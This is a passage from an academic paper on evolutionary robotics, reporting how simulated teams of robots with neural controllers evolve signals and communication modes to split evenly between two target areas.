communication system (i.e. the number, the type and the “meaning” of signals), the communication modalities (i.e. the role played by communicating individuals), and the relation between individual and social/communication abilities. The analysis of the obtained results indicates how evolving robots develop a non-trivial communication system and exploit different communication modalities. Results also indicate 1 how the possibility to co-adapt the robots’ individual and social communicative behaviours play a key role in the development of progressively more complex and effective individuals. In the following section we will review the related literature. In section 3, we will describe our experimental setup and we will show how a communication ability emerges as a result of an indirect selective pressure. In section 4, we will describe the type of signals produced by evolved robots and their effects on other robots’ behaviours. In section 5 we will describe the modalities with which evolved individuals communicate. In section 6, we will describe the relation between the individual and social/communicative behaviour. Finally, in section 7, we will discuss the implications of the obtained results. 2. Related literature In their pioneering work on evolution of communication Werner and Dyer (1992) evolved a simulated population of male and female agents living in a toroidal grid environment for the ability to ‘mate’ (i.e. for the ability of male agents to reach the physical location of female agents). The sensory-motor structure of the agents was designed so as to force them to rely on signalling behaviour and to prevent any possible alternative strategy. Indeed, females are immobile (i.e. they cannot reach males) and males are blind (i.e. they cannot detect the position of females). Females are allowed to detect the position and orientation of the closest male located in the 5x5 cells area surrounding them and to send signals (i.e. vectors of 3 binary values) to all males located in the same surrounding area. Males, on the other hand, are allowed to detect the signals produced by females and to move. By analyzing the obtained results, the authors showed how evolved individuals were able to solve the mating problem by exploiting their communication ability despite the fact that communication was not explicitly rewarded in the fitness function. By analysing how evolved males modified their motor behaviour on the basis of the signals detected, the authors showed how evolved females produced few different signals whose effect could be described with sentences like “go forward”, “turn left”, and “turn right”. More recently, Cangelosi and Parisi (1998) and Marocco et al. (2003) demonstrated how communication can emerge also in experimental settings in which communication is not necessarily required to solve adaptive problems, but it allows individuals to achieve better performance. In Marocco et al. (2003), for example, a population of robotic arm controllers have been evolved for the ability to discriminate objects with different shapes (i.e. spherical or cubic objects) on the basis of tactile sensory information by continuing to touch spherical objects while avoiding cubic objects. Evolving robots are asked to play alternatively the role of speaker and hearer. When they assume the role of speaker they only receive as input the state of tactile sensors and are allowed to produce a vector of floating point value to ‘name’ the object. When they assume the role of hearer, they receive as input both tactile and communication information (i.e. the vector of floating point number produced by a speaker agent that previously interacted with the same object). Evolved individuals display an ability to discriminate the two type of objects and to produce the appropriate motor behaviour (i.e. continuing to touch or avoiding the object) on the basis of tactile sensory information only but they also develop an ability to name the two objects with different patterns and to use these patterns to discriminate the objects immediately, thus avoiding to waste the time necessary to discriminate objects through physical interactions. Quinn et al. (Quinn 2001; Quinn et al, 2003) evolved a team of mobile robots for the ability to move while remaining close to one another. Robots are only provided with proximity sensors and therefore do not have dedicated communication channels. Despite of that, they evolve a primitive form of implicit communication based on bodily movement that allows them to coordinate and to assume different roles (see also Baldassarre et al, 2003). This is achieved through two sub-behaviours: (1) an approaching behaviour in which one of the two robots tends to produce a sustained level of activation on the infrared sensors of the other robot, and (2) a front-inversion behaviour in which the robot that experiences a sustained level of activation in its infrared sensors inverts its direction of movement. The 2 combination of these two sub-behaviours, in fact, allows the two robots to align and to assume the role of follower and leader, respectively. Finally, Di Paolo (2000) reported the results of a set of experiments in which two simulated robots moving in an arena have been evolved for the ability to approach each other and to remain close together as long as possible. Robots are provided with two motors controlling the two wheels, a sound organ able to produce sounds with different intensities, and two sound sensors symmetrically placed at ±45 degrees with respect to the frontal side of the robot that detects the intensity of the sound produced by the two robots. Evolved robots exploit the possibility to modulate the intensity of the produced sounds by producing rhythmical sounds with varying intensities phase-locked at some value near perfect anti- phase. Like the authors of the models reviewed above, we are interested in building a model in which communication can emerge without being explicitly rewarded. However, we are also interested in experimental set-ups in which individual and social/communicative behaviour can co-evolve by mutually shaping one another. Moreover, we are interested in studying how individuals might discover categories that are useful from a communication point of view and that are not already explicitly or implicitly identified in the experimental setting. Finally, we are interested in studying how not only communication abilities but also communication modalities, that regulate how individuals interact/communicate, can emerge as a result of an indirect selective pressure. For this reason, we will not impose a restricted and predefined interaction schema and we will leave robots free to determine the modality with which they will interact. By restricted and predefined interaction schema we mean the interaction modality adopted for example in Werner and Dyer (1992), in which females and males individuals can only play the role of the speaker and hearer, respectively. Or the interaction modality adopted in Cangelosi and Parisi (1998) and Marocco et al. (2003), in which, agents alternatively assume the role of speaker or hearer and in which speakers are allowed to send to hearer robots a signal consisting of a single pattern after having interacted for a certain amount of time with the same object that will be experienced by the hearer. 3. Experimental set-up and emergence of communication A group of four simulated robots live in a square arena of 270x270cm surrounded by walls that contains two circular target areas (see Figure 1, left). The robots have a circular body with a radius of 11 cm and are provided with: two motors controlling the two corresponding wheels, one communication actuator capable of sending signals with varying frequencies (signals are encoded as floating point values ranging from 0.0 to 1.0), eight infrared sensors (that detect obstacles up to a distance of about 15 cm), one ground sensor (which, by detecting the colour of the floor, can ascertain whether the robot is located on a target area or not), and four communication sensors that detect signals produced by other robots up to a distance of 100cm from four corresponding directions (i.e. frontal [315o-45o], rear [135o- 225o], left [225o-315o], right [45o-135o])1. The implementation of communication sensors are shaped in a way that allows robots to detect signals emitted by only a single robot for each direction. 1 We are currently trying to implement these robots in hardware. Robots’ signalling production and detection system will be based on Designer Systems DS-IRCM infrared wireless communication modules sold by Totalrobots, that allow the formation of a local bi-directional wireless network, and appropriate software routines. Communication between modules only occurs within a given angular range and within a distance up to 10 meters. Interferences between modules are prevented by hardware and software routines that check the intensity of incoming signals. 3 Figure 1. Left: The environment and the robots. The square represents the arena surrounded by walls. The two grey circles represent two target areas. The four black circles represent four robots. Right: The neural controller of evolving robots. Internal neurons and recurrent connections are only included in one of the two experimental settings (see text). The robots’ neural controllers consist of neural networks with 14 sensory neurons (that encode the activation states of the corresponding 13 sensors and the activation state of the communication actuator at time t-1, i.e. each robot can hear its own emitted signal at the previous time step) directly connected to the three motor neurons that control the desired speed of the two wheels and the communication signal produced by the robot. In a first experimental setting, neural controllers did not include internal neurons and recurrent connections. In the second experimental setting, neural controllers also included two internal neurons with recurrent connections. On both case the output of motor neurons was computed according to the logistic function (2). In the case of the second experimental setting, the output of sensory and internal neurons was computed according to function (3) and (4), respectively (for a detailed description of these activation functions and the relation with other related models, see Nolfi [2002]). We will call the robots of the former experimental setting reactive robots (since in their case motor actions can only be determined on the basis of the current sensory state, plus the copy of the communication neuron at the time t-1) and the robots of the latter experimental setting non-reactive robots (since in their case the motor actions are also influenced by previous sensory and internal states). ∑+= i iijjj OwtA (1) Ajj e O −+ = 1 1 (2) ( ) ( )jjtjj IOO ττ −+= − 11 (3) ( ) ( ) ( )jAtjj jeOO ττ −++= −−− 11 11 (4) 4 With Aj being the activity of the jth neuron, tj being the bias of the jth neuron, wij the weight of the incoming connections from the ith to the jth neuron, Oi the output of the ith neuron, Oj(t-1) the output of the jth neuron at the previous time step, τj the time constant of the jth neuron, and Ij the intensity of the jth sensors. Robots were evolved for the ability to find and remain in the two target areas by subdividing themselves equally between the two areas. Each team of four robots was allowed to "live" for 20 trials, lasting 100 seconds (i.e. 1000 time steps of 100 ms each). At the beginning of each trial the position and the orientation of the robots was randomly assigned outside the target areas. The fitness of the team of robots consists of the sum of 0.25 scores for each robot located in a target area and a score of -1.00 for each extra robot (i.e. each robot exceeding the maximum number of two) located in a target area. The total fitness of a team is computed by summing the fitness gathered by the four robots in each time step. The initial population consisted of 100 randomly generated genotypes that encoded the connection weights, the biases, and the time constants (in the case of non-reactive robots) of 100 corresponding neural controllers (each parameter is encoded with 8 bits and normalized in the range [–5.0, +5.0], in the case of connection weights and biases, and in the range [0.0, 1.0], in the case of time constants). Each genotype is translated into 4 identical neural controllers that are embodied in the four corresponding robots (i.e. teams are homogeneous and consist of four identical robots, for a discussion about this point and alternative selection schemas see Quinn, 2000, 2001; Quinn et al. 2003; Baldassarre et al. 2003). The 20 best genotypes of each generation were allowed to reproduce by generating five copies each, with 2% of their bits replaced with a new randomly selected value. The evolutionary process lasted 100 generations (i.e. the process of testing, selecting and reproducing robots is iterated 100 times). The experiment was replicated 10 times for each of the two experimental conditions (reactive and non-reactive neural controllers). Figure 2. The behaviour displayed by the team of evolved robots of one of the best replications for reactive (left) and non-reactive robots (right). The square and the grey circles indicate the arena and the target area respectively. Lines inside the arena indicate the trajectory of the four robots during a trial. The numbers indicate the starting and ending position of the corresponding robot (the ending position is marked with a white circle). By analysing the behaviour of one of the best teams of evolved robots for the two experimental conditions we can see how both reactive and non-reactive robots are able find and remain in the two target areas by equally distributing themselves between the two. Figure 2 (left) shows a typical behaviour exhibited by reactive robots. In this example Robots #2 and #3 quickly reach two different empty target areas. Then, robot #1 joins robot #2 in the top-left 5 target area. Robots #0, approaches and avoids the top-left target area (that already contains two robots) and later joins the bottom-left target area. In the example shown in the right part of Figure 2, that displays a typical behaviour exhibited by non-reactive robots, robots #2 and #3 quickly reach two different empty target areas. Later on, robot #1 and then robot #0 approach and enter the bottom-right target area. As soon as the third robot (i.e. robot #0) enters the area, robot #1 leaves the bottom-right target area and, after exploring the environment for a while, enters and remains in the top-left target area. To determine whether the possibility to signal and to use other robots’ signals is exploited by evolving robots and whether the type of neural architecture influences the obtained performance we tested the evolved teams of reactive and non-reactive experiments in three conditions: a normal condition, a deprived condition in which robots were not allowed to detect other robots’ signals (i.e. in which communication sensors were always set to a null value), and in a no-signal conditions in which the two sets of evolutionary experiments were replicated by not allowing robots to detect other robots’ signals and in which evolved robots were tested in the same deprived condition (see Figure 3). 0 0.1 0.2 0.3 0.4 0.5 Normal Deprived No-signals Figure 3. Average fitness of all teams of the last generations of 10 different replications of the experiments. Grey and black histograms represent the average fitness of reactive and non-reactive robots, respectively. Normal histograms represent the fitness obtained by testing the robot in a normal condition (in the same condition in which they have been evolved). Deprived histograms represent the fitness obtained by testing robots (evolved in a normal condition) in a control condition in which they are not allowed to detect other robots’ signals. No- signals histograms represent the fitness obtained by evolving and testing robots in a control condition in which they are not allowed to detect other robots’ signals. Fitness value are normalized in the range [0.0-1.0], were 1.0 corresponds to the case in which individuals spend the entire lifetime in target areas equally divided into two groups (i.e. a fitness value that cannot be reached in practice since robots first have to locate and reach the two target areas). In all cases, individuals have been tested for 1000 trials. Performance in the “Normal” condition is better than in the other two conditions. The difference is statistically significant (p < 0.001) both in the case of reactive and non-reactive robots. The fact that performance in the “Normal” condition are better demonstrate that robots use their ability to produce and detect signals. The fact that non-reactive outperform reactive robots in the normal condition (differences in performance are statistically significant) indicates that the possibility to integrate sensory- motor information through time is exploited by non-reactive individuals. Moreover, the fact that the differences of performance between reactive and non-reactive conditions are not statistically significant in the “Deprived” and “No-Signal” conditions indicates that the possibility to integrate sensory-motor information through time is exploited by 6 communicating individuals only. We will analyse the differences between robots’ individual and social behaviour and the relation between these two forms of behaviours in more detail in section 6. 4. The evolved communication system: signals produced and their effects of other robots behaviour By analysing the teams of the best replication of the experiment we observed that evolved individuals developed a non-trivial communication system, both in the case of the reactive and non-reactive experiments. More specifically evolving robots display an ability to develop a sort of lexicon (including 4-5 different signals), a perceptually grounded categorization of the physical and social world reflected by the different signals, an ability to appropriately modulate their motor behaviour on the basis of the signals detected, an ability to appropriately modulate their signalling behaviour on the basis of the signals detected. In the next two sections we will describe in details the signals produced by reactive and non-reactive robots in different conditions and the effect of the detected signals on robots’ motor and signalling behaviours. As we will see, in the case of the best replication, reactive and non-reactive robots developed a similar signalling system. However, non-reactive robots outperform reactive robots in their ability to “use” the signals detected. In section 5 we will describe the evolved communication modalities. Finally, in section 6, we will describe robots’ individual behaviour and the relation between individual and social/communicative behaviours. 4.1 Experiment I – Reactive robots Reactive robots of the best replication (the same described in Figure 2, left) produce at least four different types of signals: (a) a signal A with an value of about 0.07 produced by robots located outside the target areas not interacting with other robots located inside target areas; (b) a signal B with an value of about 0.45 produced by robots located alone inside a target area; (c) a signal C, an highly varying signal with an average value of 0.25, produced by robots located inside a target area that also contains another robot; (d) a signal D with an value of about 0.01 produced by robots that are approaching a target area and are interacting with another robot located inside the target area. Robots receiving these four types of signals modify their motor and/or signalling behaviour on the basis of the signal received and on other available sensory information. More specifically: (1) robots located outside the target areas receiving signal A tend to modify their motor behaviour in a way that allow them to explore the environment more effectively, i.e. to find more quickly the target areas (see below); (2) robots located outside target areas receiving signal B tend to modify their motor behaviour (by approaching the robot emitting the signal and the corresponding target area) and their signalling behaviour (i.e. by producing signal D instead of signal A); (3) robots located outside the target areas receiving the signal C (i.e. the signal produced by two robots located inside a target area) modify their motor behaviour so as to move away from the signal source. 7 (4) robots located inside the target areas that receive the signal C (i.e. the signal produced by two other robots located inside the target area) tend to modify their motor behaviour so as to exit from the target area. To verify the functionality of signal A, we measured the time elapsed until at least one robot of the team reaches one of the two target areas in a normal condition and in a control condition in which robots were not allowed to detect signals (i.e. in which the state of the four communication sensors of all robots was always set to a null value). By testing the best evolved team of robots in the two conditions, we observed that the time needed to reach the first target area, on the average, is 6.727s and 7.765s in the case of the normal and the control condition, respectively (grey bars in Figure 4). This implies that signals A, produced by robots located outside target areas allow the team to better explore the environment and, consequently, to more quickly reach the target areas. 0 2 4 6 8 Normal Deprived Figure 4. The average time elapsed (seconds) until at least one robot of the team reaches one of the two target areas in a normal condition (“Normal”) and in a control condition (“Deprived”) in which robots were not allowed to detect signals during the test. Black and grey bars represent the average time required by non-reactive and reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 100 seconds. To verify the functionality of signal B, we tested a team consisting of two robots placed in an environment including only a single target area (one of the robots was manually placed into the target area, while the other one was placed in a random position outside the area) in a normal condition and in a control condition in which robots were not allowed to detect signals (i.e. in which the state of the four communication sensors of all robots was always set to a null value). Testing the best evolved team of robots in the two conditions, we observed that the percentage of trials in which the robot placed outside was able to reach the target area within 100 seconds is 80.9% and 53.2% in the normal and control condition, respectively (grey bars in Figure 5). This demonstrates that robots detecting signal B modify their motor behaviour so to approach the source of the signal. We will discuss the effect of signal B on robots signalling behaviour in the next section. 8 0 20 40 60 80 100 Normal Deprived Figure 5. Percentage of trials in which both robots were able to reach the target area. Tests of a team consisting of two robots placed in an environment including only a single target area in a normal condition (“Normal”) and in a control condition (“Deprived”) in which robots were not allowed to detect signals. Grey and black bars represent the performance of reactive and non-reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 100 seconds. Robots located inside a target area produce signal B. However, two interacting robots located in the same target area reciprocally modulate their signalling behaviour so as to produce signal C (i.e. a highly varying signal with an average value of 0.25). Indeed, by placing two robots in a target area and by preventing the former to detect the signal produced by the latter, we observed that the first robot produces the signal B. To verify whether signal C reduces the chances that more than two robots enter in the same target area, we tested a team consisting of three robots in an environment including only a single target area in a normal condition and in a “Deprived” control condition in which communication was disabled (i.e. in which the state of the four communication sensors of all robots was always set to a null value). At the beginning of each trial two robots are placed inside the target area and one robot is placed outside the target area with randomly selected positions and orientations. Testing the best evolved team of robots in the two conditions we observed that the percentage of trials in which the robot initially placed outside the target area erroneously enters the area is 4.8% and 43.7%, in the normal and control condition, respectively (see grey bars in Figure 6). To verify whether signal C increases the chances that a robot exits from a target area that contains more than two robots we tested a team of three robots in an environment including only a single target area in a normal condition and in a “Deprived” control condition in which communication was disabled. At the beginning of each trial, all three robots were placed inside the target area with randomly selected positions and orientations. The percentage of times in which one of the three robots exit from the target area is 52.8% and 26.9% in normal and deprived conditions, respectively (see Figure 7, grey bars). 9 0 20 40 60 80 100 Normal Deprived Figure 6. Percentage of trials in which a third robot erroneously enters in a target area that already contains two robots in a normal condition (“Normal”) and in a control condition (“Deprived”) in which robots were not allowed to detect signals. Grey and black bars represent the performance of reactive and non-reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 100 seconds. 0 20 40 60 80 100 Normal Deprived Figure 7. Percentage of times in which one robot exit from a target area that contains three robots in a normal condition (“Normal”) and in a control condition (“Deprived”) in which robots were not allowed to detect signals. Grey and black bars represent the performance of reactive and non-reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 100 seconds. 4.2 Experiment II – Non-Reactive robots Non-reactive robots of the best replication (the same described in Figure 2, right) produce at least five different types of signals. The signals A, B, C and D are analogous to the corresponding signals produced by reactive robots (i.e. although the value of the signals varies, they are produced in the same circumstances and have functionally similar effects). More precisely, non-reactive robots produce the following signals: (a) a signal A with an value of about 0.42 produced by robots located outside the target areas that do not detect other robots’ signals; (b) a signal B with an value of about 0.85 produced by robots located alone inside a target area; 10 (c) a signal C, an highly varying signal with an average value of 0.57, produced by robots located inside a target area that also contains another robot; (d) a signal D with an value of about 0.07 produced by robots outside target areas that are approaching a target area and are interacting with another robot located inside the target area. (e) a signal E, an highly varying with an average value of 0.33, produced by robots located outside the target areas interacting with other robots also located outside target areas. Robots receiving these five types of signals modify their motor and/or signalling behaviour on the basis of the signal received and of other available sensory information. More specifically: (1) robots located outside the target areas receiving signal A modify their signalling behaviour by producing signal E; (2) robots located outside target areas receiving signal B tend to modify their motor behaviour (by approaching the robot emitting the signal and the corresponding target area) and their signalling behaviour by producing signal D; (3) robots located outside the target areas receiving the signal C (i.e. the signal produced by two robots located inside the target area) modify their motor behaviour so as to move away from the signal source; (4) robots located inside target areas receiving the signal C (i.e. the signal produced by two robots located inside the target area) modify their motor behaviour so as to exit from the target area. (5) robots located outside the target areas receiving signal E tend to modify their motor behaviour to better explore the environment. The fact that signals A and E produced by robots located outside target areas allow them to explore the environment more effectively (i.e. to more quickly find target areas) is demonstrated by the fact that the average time in which the first robot enter in one of the two target areas is 5.922s and 6.478s in normal and deprived conditions, respectively (see the black bars in Figure 4). By testing the best teams of the other replications of the experiment similar results were observed in most of the cases (result not shown). Overall, these results indicate that robots exploit their signalling behaviour to produce a form of coordinated exploration that increases their ability to quickly find the target areas. To identify the relative roles of the two signals we ran an additional test in which robots were allowed to produce and detect signal A but were not allowed to switch from signal A to E (they were forced to produce signal A even when they start to detect the signal A produced by other robots). The obtained result (i.e. an average time of 6.952s) indicates that the functionality is provided by the signal E, while the role of signal A is that to trigger the production of signal E. The fact that signal B increases the chances that other robots enter the target area from which the signal is produced is demonstrated by the fact that the percentage of trials in which a robot placed outside the target area enters in a target area that already contains a single robot is 97.2% and 75.4% in the case of robot tested in normal and deprived conditions, respectively (see the black bars in Figure 5). The fact that signal C reduces the chances that other robots enter into a target area that already contains two robots is demonstrated by the fact that the percentage of times in which a third robot joins a target area that already contains two other robots is 2.3% and 82.6% in normal and deprived conditions, respectively (see Figure 6, black bars). The fact that signal C increases the chances that a robot exits from target area that contains more than two robots is demonstrated by the fact that the percentage of times in which one of three robots located in the same target area exit the area is 84.6% and 2.7% in normal and deprived conditions, respectively (see Figure 7, black bars). 11 The functionality of signal D (both in the case of non-reactive and reactive robots) and more generally the functionality of the effects that signals detected have on the type of signals produced will be discussed in the next section. 5. The evolved communication system: communication modalities Evolving robots might rely on mono or bi-directional communication forms. In mono- directional communication forms, the motor behaviour or the signal produced by one individual affects the behaviour of a second individual but the behaviour of the latter individual does not alter the behaviour of the former individual. In these forms of communication, the two robots play the role of the ‘speaker’ and of the ‘hearer’, respectively, and communication can be described as a form of information exchange (in which communication allows the ‘hearer’ to access information that is available to the ‘speaker’) or as a form of manipulation (in which the ‘speaker’ alters the behaviour of the ‘hearer’ in a way that is useful to the ‘speaker’ or to both the ‘speaker’ and the ‘hearer’). In bi-directional communication forms, on the other hand, the motor or signalling behaviour of one individual affects the second individual and vice versa. In these forms of communication each robot plays both the role of the ‘speaker’ and of the ‘hearer’ (i.e. different roles cannot be identified). Another important aspect that characterizes communication forms is whether they consist of static or dynamical processes. In static communication forms, the signal produced by an individual is only a function of the current state of the individual. In dynamic communication forms, instead, the signal produced at a given time step is also a function of the signals produced and detected previously. As an example of a static communication form we might consider the case of a robot emitting an alarm signal continuously (until the danger disappears). As an example of a dynamic communication form we might consider the case of two individuals that alternatively play the role of the speaker and of the hearer by taking turns (Iizuka and Ikegami, 2003a, 2003b). Bi-directional and dynamical communication forms might lead to emergent properties (e.g. synchronization or shared attention) that result from the mutual interaction between two or more individuals and that cannot be explained by the sum of the individual contributions only (Di Paolo, 2000). In the experiments reported in this paper the modalities that regulate communicative behaviours are not predefined but vary within evolving individuals. Indeed, as we will see, evolved agents use different communication modalities in different circumstances. To describe the communication modalities used, let us consider a simplified situation in which a team consisting of two robots is placed in an arena that includes only a single target area. Figure 8 (left) and Figure 9 show the typical motor and signalling behaviour exhibited by two reactive robots. Initially the two robots are both outside the target area and produce a signal with an value of about 0.07 (signal A). When the two robots get close enough and detect the other robot’s signal, they slightly change their motor trajectory so as to increase their chances to end up in a target area. Individual #0 reaches the target area and starts to produce a signal with an value of about 0.45 (signal B). Once robot #1 gets close enough to robot #0 (i.e. as soon as it starts to detect the signal B produced by robot #1) it modifies its trajectory so as to approach the direction of the signal and it starts to produce signal D (i.e. a signal with almost null value). Later on, when robot #1 enters the area, the two robots start to produce an highly varying signal with an value of about 0.25 (signal C). Signal C affects the motor behaviour of robots located outside the target area (which tend to avoid the target area) and inside the target area (which tend to exit from areas that contains more than two robots). Signal C also affects the signalling behaviour of other robots located inside a target area. 12 Indeed, robots located inside a target area switch their signalling behaviour from B to C when they detect the signal produced by another robot located in the same target area. Figure 8. The behaviour of two robots tested in an arena including a single target area. The dashed and full lines represent the trajectory of robot #0 and #1, respectively. The numbers indicate both the starting and ending positions of the corresponding robots. Left: typical behaviour exhibited by a reactive robot. Right: typical behaviour exhibited by a non-reactive robot. 13 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 250 500 750 1000 1250 1500 lifecycles si gn al in te n si ty 0 & 1 out 0 in, 1 out 0 & 1 in A B C D Figure 9. Values of the signals produced by the two reactive robots during the behaviour shown in the left side of Figure 8. Dashed and full lines indicate the values of the signals produced by robot #0 and #1, respectively. Letters (A,B,C, and D) indicate the 4 classes of signals produced by the robots. The black lines at the bottom of the figure indicate the three phases in which: (1) both robots are outside the target area, (2) robot #0 is in and robot #1 is out, and (3) both robots are inside the target area. The grey lines at the bottom of the figure indicate the phases in which the two robots are located within the signal range. The short signals produced when the robots outside target areas are produced when they detect an obstacle through their infrared sensors. These signals do not seem to play any functional role. As shown in Figure 8 (right) and Figure 10, non-reactive robots rely on similar communication modalities. Initially the two robots are both outside the target area and produce a signal with an value of about 0.42 (signal A). As soon as the two robots get close enough to detect their signals, they produce a signal with a varying value and an average value of 0.33 (signal E) and they vary their motor trajectory by increasing their turning angle so to increase their chance to enter into a target area. After some time robot #0 reaches the target area and starts to produce a signal with an value of about 0.85 (signal B). Later on, once robot #1 returns close enough to robot #0 and detects the signal B produced by robot #0, it modifies its motor trajectory (by approaching robot #0) and its signalling behaviour (by producing signal D, i.e. a signal with an almost null value, instead of signal A). When also robot #1 enters the area, the two robots start to produce a varying signal with an average value of about 0.57 (signal C). This signal reduces the probability that other robots will enter in the area and eventually, if an additional robot erroneously joins the area, increases the probability that a one of the robots exits from the area. 14 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 200 400 600 800 1000 lifecycles si gn al in te n si ty 0 & 1 out 0 in, 1 out 0 & 1 in A B C D E Figure 10. Values of the signals produced by the two robots provided with hidden units during the behaviour shown in the right side of Figure 7. Dashed and full lines indicate the values of the signals produced by robot #0 and #1, respectively. Letters (A, B, C, D and E) indicate the 5 classes of signals produced by the robots. The black lines in the bottom part of the figure indicate the three phases in which: (1) both robots are out the target area, (2) robot n.0 is in and robot n.1 is out, and (3) both robots are inside the target area. The grey line in the bottom part of the figure indicate the phases in which the two robots are located within the signal range. The short signals produced when the robots outside target areas are produced when they detect an obstacle through their infrared sensors. These signals do not seem to play any functional role. By analysing the functionality of the different signals and the context in which they are used, we can see how evolved robots use different communication modalities and select on the fly the modality that is appropriate for the current situation. The situation in which one robot is located inside a target area and another robot is located outside, within the communication range, is a case in which the former robot has access to information (related to the location of the target area) to which the latter robot does not have access to. In this particular case, communication should be mono-directional since the latter robot should change its behaviour on the basis of the signal produced by the former robot while the former robot should not necessarily change its motor or signalling behaviour as a result of the signal produced by the latter robot. Indeed in this situation the evolved robots rely on a mono-directional communication form in which the former robot produces the signal B and the latter robot switches its signalling behaviour off by producing the signal D (i.e. a signal with an almost null value). This communication interaction thus can be described as an information exchange behaviour in which the former robot (the speaker) produces a signal that encodes information related to the location of the target area and the latter robot (the hearer) exploits this information to navigate toward the area. Or, 15 alternatively, this communication interaction can be described as a form of manipulation in which the former robot (the speaker) manipulates the motor behaviour of the latter robot (the hearer) so as to drive the robot toward the target area. The ability of robots located outside target areas to switch their signalling behaviour off (i.e. to produce the signal D) as soon as they detect the signal B plays an important function both in the case of reactive and non-reactive robots. Indeed, by testing a team of two robots in an environment including a single target area, in a normal condition and in a control condition in which robots were prevented from the ability to switch between signal A and D, we observed that performance in the control condition are much worse. More precisely, the percentage of trials in which both robots were able to reach the target area within 100 seconds drop from 80.9% to 22.5% (in the case of reactive robots) and from 97.2% and 23.8% (in the case of non-reactive robots) in the normal and control conditions, respectively (Figure 11). 0 20 40 60 80 100 Normal No Modulation Figure 11. Percentage of trials in which a team of two robots randomly placed in an environment with only one target area are able to both enter in the target area. Tests performed in a normal conditions and in a control condition in which robots outside target area were not allowed to switch their signalling behaviour from A to D. Grey and black bars represent the performance of reactive and non-reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 100 seconds. On the contrary, when two robots are located in the same target area, none of the two robots have access to the relevant information (i.e. the fact that the target area contains two robots). This information, however, can be generated by the interaction between the two robots through a bi-directional communication modality. This is indeed the communication modality that is selected by evolved robots in this circumstance. The signal produced by one of the two robot affects the signal produced by the second robot, and vice versa. This bi-directional interaction allow the two robots to switch from signal B (i.e. a signal that increases the chances that other robots will joint the area) to signal C (i.e. a signal that decreases the chances that other robots will joint the area). Interestingly in this circumstance, evolved robots also rely on a dynamical communication modality, i.e. they produce signals that vary in time as a result of signals previously produced and detected by the two robots. More precisely, in the case of non- reactive robots, the signal C tend to vary in time as a result of the following factors: (1) the value of the signal detected inhibits the signal produced, (2) the intensity of the inhibition also depends on the direction of the detected signal, (3) the signal tends to be detected by always varying relative directions since robots located inside target area turn on the spot. 16 The production of an oscillatory signal with an average value of 0.57 (in the case of non- reactive robots) in this situation, rather then a stable non-dynamical signal, plays an important functional role. Indeed, we observed that evolved robots rely on oscillatory signals in all the replications of the experiment (both in the case of reactive and non-reactive robots). Moreover we observed that stable signals do not allow to reach the same level of performance. To ascertain whether the production of a stable signal could lead to the same functionality of this oscillatory signal we performed a test in which non-reactive robots were forced to emit a stable signal when located in a target area that contained two robots. Robots were allowed to behave normally in all other cases. The test was repeated 10 times by using stable signals with 10 different values ranging from 0.1 to 1.0. The fact that, as shown in Figure 12, obtained performance is always lower than performance obtained by allowing the robots to produce the oscillatory signal confirms that the dynamical nature of the signal is functional. 0 0.2 0.4 0.6 0.8 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 Figure 12. The continuous line represents the fitness values obtained by a team of non-reactive robots tested in a control condition in which robots are forced to emit a stable signal when they are located in a target area that contains two or more robots. The vertical and horizontal axis represent the fitness and the value of the signal, respectively. The dashed line represents a benchmark showing the value of the fitness reached by a team tested in normal condition. For each condition robots are tested for 1000 trials. One reason that might explain the necessity to rely on an oscillatory signal in this circumstance is the fact that the signal C has at least three different functions: it informs other robot located in the target area of the presence of the signalling robot, it reduces the probability that other robots enter the target area, and it increases the probability that, when the target area contains more than two robots, one of the robot will exit the area. Indeed by analysing the behaviour of the robots in the test in which robots were forced to produce signals with a fixed value we observed that: (a) when the value of the signal is below 0.7, robots tend to erroneously exit from the target area also when the area includes only two robots, and (b) when the value of the signal is 0.7 or above, both the ability to reduces the chances that other robots joint the target area and the ability to increase the chances that robots exit from the target area (when the area contains more that two robots) are severely impaired. Another possible reason that might explain the necessity to produce an oscillatory signal is the fact that the signal C must produce the same effect (i.e. reduce the chances that other robots enter in the target area) both when the signal is produced by two or three interacting robots located into the same target area, and two different effects (i.e. increase the chances that one robot exit from the target area or not) when the signal is produced by three or two robots located in the same target area, respectively. The frequency of oscillation of signal C varies when the signal is produced by two or three robots located in the same target area. Indeed, by analysing the signals produced in these two circumstances by a Fourier Transform, we observed that the frequency and the 17 spectrograms are different in the two cases (see Figure 13). These two signals, C1 and C2, emitted by a robot located in an area with another or two other robots respectively, have different functions since signal C2 increases the chances that one of the robot exits from the target area while signal C1 does not. Figure 13. The two spectrograms (obtained by the Fourier Transform) of the signal C emitted by a robot. The left and right pictures correspond to the signal produced by a robot located in a target area that contains another or another two robots, respectively. The sampling frequency is 10Hz, since each communication output is emitted by a robot each 0.1 seconds. Therefore, the frequency components range is [0,5] Hz. 6. Relation between individual and social/communicative behaviour Since the robots individual and social behaviour co-evolve we might wonder which the relation between these two forms of behaviour is and how the possibility to co-adapt these forms of behaviour is exploited in evolved individuals. The fact that the performance of robots that are tested in the “Deprived” control condition is similar to that of robots evolved and tested in a “No-signal” control condition (see Figure 3) indicates that evolved robots develop an effective individual behaviour (i.e. a behaviour that maximizes the performance that can be achieved without signalling) even if they have always been evaluated in a normal condition (in which signals are available). The adaptive pressure toward the development of an effective individual behaviour can be explained by considering that the social enhancement that can be achieved by exploiting the signal produced by the other robots is not always guaranteed. Indeed, the availability of the signals required is due to the presence of other robots in the right environmental locations that, in turn, is influenced by unpredictable variable such us the initial positions and orientations of the robots. By analysing the behaviour displayed by evolved robots tested in the “Deprived” control condition (Figures 15), we can see that both reactive and non-reactive robots are able to spend about 60% of their lifetime in the three most favourable conditions (in which the team gathers a fitness of 0.5, 0.75, or 1.0) and less than 10% of their lifetime in the two least favourable conditions (in which the team gathers a fitness of -0.25 or -1.0). These performances are achieved through a simple behaviour (see Figure 14) that includes the following elementary behaviours: (a) when robots approach walls or other robots they avoid the obstacles by turning approximately 90o; (b) when the robots are far from walls and are not located in target areas they move by producing a curvilinear trajectory; (c) when the robots are located in a target area, they remain in the area by turning on the spot. Reactive and non-reactive robots mainly differ with respect to the curvilinear trajectories produced far from walls, 